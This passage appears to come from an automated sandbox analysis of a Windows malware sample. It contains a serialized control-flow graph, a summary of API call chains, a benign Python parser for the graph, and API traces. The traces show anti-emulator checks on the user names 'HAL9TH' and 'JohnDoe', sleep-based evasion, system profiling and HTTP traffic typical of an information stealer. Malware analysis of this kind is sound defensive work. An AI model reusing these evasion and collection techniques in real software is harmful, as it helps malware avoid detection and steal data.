88940 3522b2 StrCmpCA 88893->88940 88948 3523ea StrCmpCA 88893->88948 88950 341324 lstrcpyA 88893->88950 88951 352522 StrCmpCA 88893->88951 88952 351471 23 API calls 88893->88952 88895 352678 88894->88895 88897 34e63b lstrcpyA 88895->88897 88896->88893 88898 352631 88896->88898 88899 352682 88897->88899 88901 34e63b lstrcpyA 88898->88901 90209 3420be lstrcpyA 88899->90209 88900->88893 88902 35263d 88901->88902 90205 342078 88902->90205 88903->88893 88906 3525c5 88910 34e63b lstrcpyA 88906->88910 88908->88893 88911 3525ff 88908->88911 88909 34e63b lstrcpyA 
88913 352650 88909->88913 88912 35269d 88910->88912 88914 34e63b lstrcpyA 88911->88914 90192 35162f 88912->90192 90208 3420be lstrcpyA 88913->90208 88915 35260b 88914->88915 90203 3420a2 lstrcpyA 88915->90203 88919->88893 88920->88893 88921 352614 88922 34e63b lstrcpyA 88921->88922 88925 35261e 88922->88925 88923->88893 88924 3525ca 88923->88924 88926 34e63b lstrcpyA 88924->88926 90204 3420d3 lstrcpyA 88925->90204 88928 3525d6 88926->88928 88927->88893 90201 3420a2 lstrcpyA 88928->90201 88931 3525df 88933 34e63b lstrcpyA 88931->88933 88935 352595 88932->88935 88936 352585 Sleep 88932->88936 88937 3525e9 88933->88937 88934->88893 88939 34e63b lstrcpyA 88935->88939 88936->88893 90202 3420d3 lstrcpyA 88937->90202 88938->88893 88941 3525a1 88939->88941 88940->88893 90199 3420a2 lstrcpyA 88941->90199 88944 3525aa 88945 34e63b lstrcpyA 88944->88945 88946 3525b4 88945->88946 90200 3420a2 lstrcpyA 88946->90200 88947 3526b1 88947->87915 88948->88893 88950->88893 88951->88893 88952->88893 88954 34e63b lstrcpyA 88953->88954 88955 35188e 88954->88955 88956 34e63b lstrcpyA 88955->88956 88957 35189a 88956->88957 88958 34e63b lstrcpyA 88957->88958 88959 3518a6 88958->88959 88959->87918 88961 34e5cb 88960->88961 88962 34e5e0 88961->88962 88963 34e5d8 lstrcpyA 88961->88963 88962->87931 88963->88962 88964->87951 88966 34f0a6 GetVolumeInformationA 88965->88966 88967 34f09f 88965->88967 88968 34f0d6 88966->88968 88967->88966 88969 34f108 GetProcessHeap HeapAlloc 88968->88969 88970 34f12c wsprintfA lstrcatA 88969->88970 88971 34f11e 88969->88971 90210 34efba GetCurrentHwProfileA 88970->90210 88972 34e57d lstrcpyA 88971->88972 88974 34f127 88972->88974 88974->87965 88975 34f15c 88976 34f165 lstrlenA 88975->88976 88977 34f17a 88976->88977 90226 34fc4f lstrcpyA malloc strncpy 88977->90226 88979 34f184 88980 34f18e lstrcatA 88979->88980 88981 34f19e 88980->88981 88982 34e57d lstrcpyA 88981->88982 88983 34f1af 88982->88983 88983->88974 88985 34e5b4 lstrcpyA 88984->88985 88986 343f98 
88985->88986 90230 343ef3 88986->90230 88988 343fa4 88989 34e57d lstrcpyA 88988->88989 88990 343fc2 88989->88990 88991 34e57d lstrcpyA 88990->88991 88992 343fcb 88991->88992 88993 34e57d lstrcpyA 88992->88993 88994 343fd4 88993->88994 88995 34e57d lstrcpyA 88994->88995 88996 343fdd 88995->88996 88997 34e57d lstrcpyA 88996->88997 88998 343fe6 88997->88998 88999 343ff7 InternetOpenA StrCmpCA 88998->88999 89000 34401a 88999->89000 89001 344486 InternetCloseHandle 89000->89001 89002 34f6b1 2 API calls 89000->89002 89014 34449a 89001->89014 89003 344031 89002->89003 89004 34e682 2 API calls 89003->89004 89005 344040 89004->89005 89006 34e63b lstrcpyA 89005->89006 89007 344049 89006->89007 89008 34e6d4 3 API calls 89007->89008 89009 34406b 89008->89009 89010 34e63b lstrcpyA 89009->89010 89011 344074 89010->89011 89012 34e6d4 3 API calls 89011->89012 89013 34408e 89012->89013 89015 34e63b lstrcpyA 89013->89015 89014->87969 89016 344097 89015->89016 89017 34e682 2 API calls 89016->89017 89018 3440af 89017->89018 89019 34e63b lstrcpyA 89018->89019 89020 3440b8 89019->89020 89021 34e6d4 3 API calls 89020->89021 89022 3440d1 89021->89022 89023 34e63b lstrcpyA 89022->89023 89024 3440da 89023->89024 89025 34e6d4 3 API calls 89024->89025 89026 3440ef 89025->89026 89027 34e63b lstrcpyA 89026->89027 89028 3440f8 89027->89028 89029 34e6d4 3 API calls 89028->89029 89030 34411a 89029->89030 89031 34e682 2 API calls 89030->89031 89032 344121 89031->89032 89033 34e63b lstrcpyA 89032->89033 89034 34412a 89033->89034 89035 34413a InternetConnectA 89034->89035 89035->89001 89036 344164 HttpOpenRequestA 89035->89036 89037 34419c 89036->89037 89038 34447d InternetCloseHandle 89036->89038 89039 3441a2 InternetSetOptionA 89037->89039 89040 3441b8 89037->89040 89038->89001 89039->89040 89041 34e6d4 3 API calls 89040->89041 89042 3441c5 89041->89042 89043 34e63b lstrcpyA 89042->89043 89044 3441ce 89043->89044 89045 34e682 2 API calls 89044->89045 89046 3441e6 89045->89046 89047 34e63b lstrcpyA 
89046->89047 89048 3441ef 89047->89048 89049 34e6d4 3 API calls 89048->89049 89050 344204 89049->89050 89051 34e63b lstrcpyA 89050->89051 89052 34420d 89051->89052 89053 34e6d4 3 API calls 89052->89053 89054 344227 89053->89054 89055 34e63b lstrcpyA 89054->89055 89056 344230 89055->89056 89057 34e6d4 3 API calls 89056->89057 89058 344249 89057->89058 89059 34e63b lstrcpyA 89058->89059 89060 344252 89059->89060 89061 34e6d4 3 API calls 89060->89061 89062 34426b 89061->89062 89063 34e63b lstrcpyA 89062->89063 89064 344274 89063->89064 89065 34e682 2 API calls 89064->89065 89066 34428c 89065->89066 89067 34e63b lstrcpyA 89066->89067 89068 344295 89067->89068 89069 34e6d4 3 API calls 89068->89069 89070 3442aa 89069->89070 89071 34e63b lstrcpyA 89070->89071 89072 3442b3 89071->89072 89073 34e6d4 3 API calls 89072->89073 89074 3442c8 89073->89074 89075 34e63b lstrcpyA 89074->89075 89076 3442d1 89075->89076 89077 34e682 2 API calls 89076->89077 89078 3442e9 89077->89078 89079 34e63b lstrcpyA 89078->89079 89080 3442f2 89079->89080 89081 34e6d4 3 API calls 89080->89081 89082 344307 89081->89082 89083 34e63b lstrcpyA 89082->89083 89084 344310 89083->89084 89085 34e6d4 3 API calls 89084->89085 89086 34432a 89085->89086 89087 34e63b lstrcpyA 89086->89087 89088 344333 89087->89088 89089 34e6d4 3 API calls 89088->89089 89090 34434c 89089->89090 89091 34e63b lstrcpyA 89090->89091 89092 344355 89091->89092 89093 34e6d4 3 API calls 89092->89093 89094 34436e 89093->89094 89095 34e63b lstrcpyA 89094->89095 89096 344377 89095->89096 89097 34e682 2 API calls 89096->89097 89098 34438f 89097->89098 89099 34e63b lstrcpyA 89098->89099 89100 344398 89099->89100 89101 34e57d lstrcpyA 89100->89101 89102 3443a9 89101->89102 89103 34e682 2 API calls 89102->89103 89104 3443c1 89103->89104 89105 34e682 2 API calls 89104->89105 89106 3443c8 89105->89106 89107 34e63b lstrcpyA 89106->89107 89108 3443d1 89107->89108 89109 3443e9 lstrlenA 89108->89109 89110 3443f9 89109->89110 89111 344402 lstrlenA 
Control-flow Graph

The serialized node/edge data of the interactive graph (node id, address, API names, and id->id edges) is not reproduced here. The API call chains that can be read off it, with the node addresses as they appear in the graph:

• 344412 HttpSendRequestA -> 344457 InternetReadFile -> 34446e InternetCloseHandle; InternetReadFile also branches to 344424, which cycles through 34e6d4 (3 API calls) and 34e63b lstrcpyA back into InternetReadFile, i.e. a read loop that copies each chunk with lstrcpyA.
• 350c72 StrCmpCA with one branch to 350c7d ExitProcess and the other to 350c94 strtok_s, followed by ten further StrCmpCA nodes (350cca, 350ce2, 350cfa, 350d12, 350d32, 350d43, 350d54, 350d65, 350d77, 350d95), 350da5 strtok_s and 34e5f1 (2 API calls): a token-by-token string comparison loop whose entry check can terminate the process.
• 345b60 InternetOpenA StrCmpCA -> 345ca3 InternetConnectA -> 345ccd HttpOpenRequestA -> 345d0b InternetSetOptionA -> a long chain of 34e6d4 (3 API calls), 34e682 (2 API calls) and 34e63b lstrcpyA nodes (345d2e through 346000) -> 346010 / 346021 / 346044 / 346066 / 34609b lstrlenA, GetProcessHeap HeapAlloc and memcpy -> 3460ab HttpSendRequestA -> 3460f0 InternetReadFile -> 346107 InternetCloseHandle, again with a 34e6d4 / 34e63b lstrcpyA read loop (3460bd). The other branches out of InternetConnectA and HttpOpenRequestA go to 34611c and 346113 InternetCloseHandle.
• After 34611c InternetCloseHandle: 346137 -> 346a41 CryptStringToBinaryA -> 346a6b LocalAlloc -> 346a7b CryptStringToBinaryA -> 346a92 LocalFree (the size-query-then-decode idiom for CryptStringToBinaryA).
• 35074a strtok_s, 350559 strtok_s (with StrCmpCA at 350597, 3505c5, 3505ea, 35061b and 35064d strtok_s) and 350697 strtok_s (with 3506ce StrCmpCA and 350706 strtok_s), each with 34e5f1 (2 API calls): further tokenize-and-compare loops.
• A system-information chain starting at 35289a: 34e851 GetProcessHeap HeapAlloc GetLocalTime wsprintfA; 34ef2d memset RegOpenKeyExA -> 34ef79 RegQueryValueExA -> 34ef94 RegCloseKey CharToOemA; 34efba (7 API calls); 34f078 (15 API calls); 352aed GetCurrentProcessId -> 34fb18 OpenProcess -> 34fb38 K32GetModuleFileNameExA CloseHandle; 34f1be GetProcessHeap HeapAlloc -> 34e769 GetProcessHeap HeapAlloc RegOpenKeyExA -> 34e7ac RegQueryValueExA -> 34e7c3 RegCloseKey -> 34f1f1 RegOpenKeyExA -> 34f211 RegQueryValueExA -> 34f229 RegCloseKey; 34f2ff _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance -> 34f36d CoSetProxyBlanket -> 34f3d1 VariantInit -> 34f237 _EH_prolog CoCreateInstance -> 34f270 SysAllocString -> 34f2ab _wtoi64 SysFreeString / 34f2cf SysFreeString -> 34f3fe FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA (the COM call sequence typical of a WMI client query). The steps are separated by 34e6d4 / 34e682 / 34e63b lstrcpyA string-building nodes.
• 359035 _MSFOpenExW / 358135 lstrlenA lstrcpyA _MSFOpenExW; 358210 SetFilePointer; 358246 CreateFileA; 3582aa CreateFileMappingA -> 3582c6 MapViewOfFile -> 3582dc CloseHandle (file access through a memory mapping).
• 343f08 ??_U@YAPAXI (operator new[], three calls) -> 343f4a lstrlenA -> 343f5a InternetCrackUrlA (URL parsing); 34fc4f lstrcpyA malloc strncpy -> 34f01d lstrcatA -> 34f033 lstrcatA; 34efe7 memset.
• A second code region at 61e0xxxx-61e8xxxx (61e84a87, 61e1d21e, 61e13ed7, 61e2a652, ...) that only shows CRT calls (free, memmove, realloc, malloc) and nodes summarised as 25 API calls / 22 API calls.
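Joe Sandbox serves the graph as a flat token stream: "node id, address, API names" for nodes and "id->id" for edges, with some nodes summarised as "N API calls". The Python below is an added example (not part of the report, and not code from the sample) that parses that serialization, lists the APIs reachable from a node in breadth-first order, and reports the back-edges that mark loops; it is run on a constructed excerpt taken from the HttpSendRequestA / InternetReadFile chain above. Assumptions: node ids are five-digit decimals and edges are written id->id, as in this report; the addresses in the excerpt are not Windows APIs and are treated as opaque labels.

```python
import re
from collections import deque

# Constructed excerpt of the serialized control-flow graph in this report:
# the HttpSendRequestA / InternetReadFile / InternetCloseHandle chain.
CFG_EXCERPT = (
    "89113 344412 HttpSendRequestA 89114 344457 InternetReadFile 89113->89114 "
    "89115 34446e InternetCloseHandle 89114->89115 89118 344424 89114->89118 "
    "89116 34e5e8 89115->89116 89116->89038 89117 34e6d4 3 API calls "
    "89117->89118 89118->89114 89118->89115 89118->89117 "
    "89119 34e63b lstrcpyA 89118->89119 89119->89118"
)

# Assumption (true of this report): node ids are 5-digit decimals, while
# addresses are hex and never exactly 5 decimal digits, so the two do not collide.
NODE_ID = re.compile(r"^\d{5}$")
EDGE = re.compile(r"^(\d{5})->(\d{5})$")


def parse_cfg(text):
    """Return (nodes, edges): nodes maps id -> (address, label); edges maps
    id -> [successor ids] in the order the edges appear in the stream."""
    nodes, edges = {}, {}
    toks = text.split()
    i = 0
    while i < len(toks):
        m = EDGE.match(toks[i])
        if m:
            edges.setdefault(int(m.group(1)), []).append(int(m.group(2)))
            i += 1
            continue
        if NODE_ID.match(toks[i]) and i + 1 < len(toks):
            nid, addr = int(toks[i]), toks[i + 1]
            i += 2
            label = []
            # Everything up to the next node id or edge is the node's label
            # (API names, or the "N API calls" summary for a collapsed subcall).
            while i < len(toks) and not NODE_ID.match(toks[i]) and not EDGE.match(toks[i]):
                label.append(toks[i])
                i += 1
            nodes[nid] = (addr, " ".join(label))
            continue
        i += 1  # stray token: skip it
    return nodes, edges


def api_sequence(nodes, edges, start):
    """Labels of the nodes reachable from `start`, breadth-first. Unlabeled
    connector nodes and ids outside the excerpt are traversed but not listed."""
    seen, order, queue = {start}, [], deque([start])
    while queue:
        n = queue.popleft()
        label = nodes.get(n, ("", ""))[1]
        if label:
            order.append(label)
        for m in edges.get(n, []):
            if m not in seen:
                seen.add(m)
                queue.append(m)
    return order


def back_edges(edges, start):
    """Edges that close a cycle on the DFS path from `start`; in the excerpt
    these are the InternetReadFile read loop and its lstrcpyA helper loops."""
    seen, on_path, found = set(), set(), []

    def dfs(n):
        seen.add(n)
        on_path.add(n)
        for m in edges.get(n, []):
            if m in on_path:
                found.append((n, m))
            elif m not in seen:
                dfs(m)
        on_path.discard(n)

    dfs(start)
    return found


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_EXCERPT)
    print(api_sequence(nodes, edges, 89113))
    for src, dst in back_edges(edges, 89113):
        print("loop:", nodes[src][0], "->", nodes.get(dst, ("?",))[0])
```

On the excerpt the breadth-first walk from 344412 yields HttpSendRequestA, InternetReadFile, InternetCloseHandle, the "3 API calls" helper and lstrcpyA, and the back-edges show 344424 returning to InternetReadFile, which is what makes this a read-until-done loop rather than a single read.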

APIs
• Part of subcall function 003410B4: MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 003410D4
• Part of subcall function 003410B4: GetLastError.KERNEL32(?,?,?,003554AD), ref: 003410DA
• Part of subcall function 003410B4: SetCriticalSectionSpinCount.KERNEL32(00000000,00000000,?,?,?,003554AD), ref: 003410E2
• Part of subcall function 003410B4: GetWindowContextHelpId.USER32(00000000), ref: 003410E9
• Part of subcall function 003410B4: GetWindowLongW.USER32(00000000,00000000), ref: 003410F1
• Part of subcall function 003410B4: RegisterClassW.USER32(00000000), ref: 003410F8
• Part of subcall function 003410B4: IsWindowVisible.USER32(00000000), ref: 003410FF
• Part of subcall function 003410B4: ConvertDefaultLocale.KERNEL32(00000000,?,?,?,003554AD), ref: 00341106
• Part of subcall function 003410B4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,003554AD), ref: 00341112
• Part of subcall function 003410B4: IsDialogMessageW.USER32(00000000,00000000), ref: 0034111A
• Part of subcall function 003410B4: GetProcessHeap.KERNEL32(00000000,?,?,?,?,003554AD), ref: 00341124
• Part of subcall function 003410B4: HeapFree.KERNEL32(00000000,?,?,?,003554AD), ref: 0034112B
• Part of subcall function 00341134: GetTempPathW.KERNEL32(00000104,?), ref: 00341154
• Part of subcall function 00341134: wsprintfW.USER32 ref: 0034117A
• Part of subcall function 00341134: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 003411AA
• Part of subcall function 00341134: GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 003411BF
• Part of subcall function 00341134: RtlAllocateHeap.NTDLL(00000000), ref: 003411C6
• Part of subcall function 00341134: _time64.MSVCRT ref: 003411CF
• Part of subcall function 00341134: srand.MSVCRT ref: 003411D5
• Part of subcall function 00341134: rand.MSVCRT ref: 003411DA
• Part of subcall function 00341134: memset.MSVCRT ref: 003411EA
• Part of subcall function 00341134: WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 003411FC
• Part of subcall function 00341134: memset.MSVCRT ref: 00341216
• Part of subcall function 00341134: CloseHandle.KERNEL32(?), ref: 00341221
• Part of subcall function 00341134: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0034123D
• Part of subcall function 00341134: ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00341253
• LoadLibraryA.KERNEL32(000007CE), ref: 003554BE
• GetProcAddress.KERNEL32(00000000,Sleep), ref: 003554DA
• Sleep.KERNEL32(00000014), ref: 003554E5
• Sleep.KERNEL32(00000014), ref: 003554E8
• Sleep.KERNEL32(00000014), ref: 003554EF
• Sleep.KERNEL32(00000014), ref: 003554F6
• Sleep.KERNEL32(00000014), ref: 003554FD
• Sleep.KERNEL32(00000014), ref: 00355504
• GetProcAddress.KERNEL32(00000000,GetSystemTime), ref: 00355510
• Sleep.KERNEL32(00000014), ref: 00355518
• Sleep.KERNEL32(00000014), ref: 0035551F
• Sleep.KERNEL32(00000014), ref: 00355526
• Sleep.KERNEL32(00000014), ref: 0035552D
• Sleep.KERNEL32(00000014), ref: 00355534
• Sleep.KERNEL32(00000014), ref: 0035553B
• GetProcAddress.KERNEL32(00000000,GetSystemInfo), ref: 00355547
• Sleep.KERNEL32(0000000C), ref: 00355557
• Sleep.KERNEL32(0000000C), ref: 0035555E
• Sleep.KERNEL32(0000000C), ref: 00355565
• Sleep.KERNEL32(0000000C), ref: 0035556C
• Sleep.KERNEL32(0000000C), ref: 00355573
• Sleep.KERNEL32(0000000C), ref: 0035557A
• Sleep.KERNEL32(0000000C), ref: 00355581
• Sleep.KERNEL32(0000000C), ref: 00355588
• Sleep.KERNEL32(0000000C), ref: 0035558F
• Sleep.KERNEL32(0000000C), ref: 00355596
• Sleep.KERNEL32(0000000C), ref: 0035559D
• Sleep.KERNEL32(0000000C), ref: 003555A4
• Sleep.KERNEL32(0000000C), ref: 003555AB
• Sleep.KERNEL32(0000000C), ref: 003555B2
• Sleep.KERNEL32(0000000C), ref: 003555B9
• Sleep.KERNEL32(0000000C), ref: 003555C0
• Sleep.KERNEL32(0000000C), ref: 003555C7
• Sleep.KERNEL32(0000000C), ref: 003555CE
• Sleep.KERNEL32(0000000C), ref: 003555DA
• Sleep.KERNEL32(0000000C), ref: 003555E1
• Sleep.KERNEL32(0000000C), ref: 003555E8
• Sleep.KERNEL32(0000000C), ref: 003555EF
• Sleep.KERNEL32(0000000C), ref: 003555F6
• Sleep.KERNEL32(0000000C), ref: 003555FD
• Sleep.KERNEL32(0000000C), ref: 00355604
• Sleep.KERNEL32(0000000C), ref: 0035560B
• Sleep.KERNEL32(0000000C), ref: 00355612
• Sleep.KERNEL32(0000000C), ref: 00355619
• Sleep.KERNEL32(0000000C), ref: 00355620
• Sleep.KERNEL32(0000000C), ref: 00355627
• Sleep.KERNEL32(0000000C), ref: 0035562E
• Sleep.KERNEL32(0000000C), ref: 00355635
• Sleep.KERNEL32(0000000C), ref: 0035563C
• Sleep.KERNEL32(0000000C), ref: 00355643
• Sleep.KERNEL32(0000000C), ref: 0035564A
• Sleep.KERNEL32(0000000C), ref: 00355651
• Sleep.KERNEL32(0000000C), ref: 0035565D
• Sleep.KERNEL32(0000000C), ref: 00355664
• Sleep.KERNEL32(0000000C), ref: 0035566B
• Sleep.KERNEL32(0000000C), ref: 00355672
• Sleep.KERNEL32(0000000C), ref: 00355679
• Sleep.KERNEL32(0000000C), ref: 00355680
• Sleep.KERNEL32(0000000C), ref: 00355687
• Sleep.KERNEL32(0000000C), ref: 0035568E
• Sleep.KERNEL32(0000000C), ref: 00355695
• Sleep.KERNEL32(0000000C), ref: 0035569C
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556A3
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556AA
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556B1
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556B8
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556BF
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556C6
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556CD
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556D4
                                                                                                                                                                                        • Part of subcall function 00341043: strcmp.MSVCRT ref: 0034104E
                                                                                                                                                                                        • Part of subcall function 00341043: strcmp.MSVCRT ref: 00341064
                                                                                                                                                                                        • Part of subcall function 00341043: ExitProcess.KERNEL32 ref: 00341070
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556E0
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556E7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556EE
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556F5
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556FC
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355703
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035570A
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355711
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355718
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035571F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355726
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035572D
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355734
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035573B
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355742
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355749
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355750
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355757
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355763
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035576A
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355771
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355778
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035577F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355786
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035578D
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355794
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035579B
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557A2
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557A9
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557B0
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557B7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557BE
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557C5
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557CC
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557D3
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557DA
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C0E
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C25
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C3C
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C53
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C6A
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C81
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C98
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355CAF
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355CC6
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355CDD
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355CF4
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D0B
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D22
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D39
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D50
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D67
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D7E
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D95
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355DAC
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355DC3
                                                                                                                                                                                        • Part of subcall function 00355BCA: LoadLibraryA.KERNEL32(003557E5), ref: 00355DD4
                                                                                                                                                                                        • Part of subcall function 00355BCA: LoadLibraryA.KERNEL32 ref: 00355DE5
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557E6
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557ED
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557F4
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557FB
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355802
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355809
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355810
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355817
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035581E
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355825
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035582C
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355833
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035583A
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355841
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355848
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035584F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355856
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035585D
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C,0035E266), ref: 00355871
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355878
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035587F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355886
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035588D
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355894
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035589B
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558A2
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558A9
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558B0
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558B7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558BE
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558C5
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558CC
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558D3
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558DA
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558E1
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558E8
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F0
                                                                                                                                                                                        • Part of subcall function 0034E7E4: HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F7
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetUserNameA.ADVAPI32(00000000,?), ref: 0034E80B
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00361408,?,00000000), ref: 00355953
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0035595E
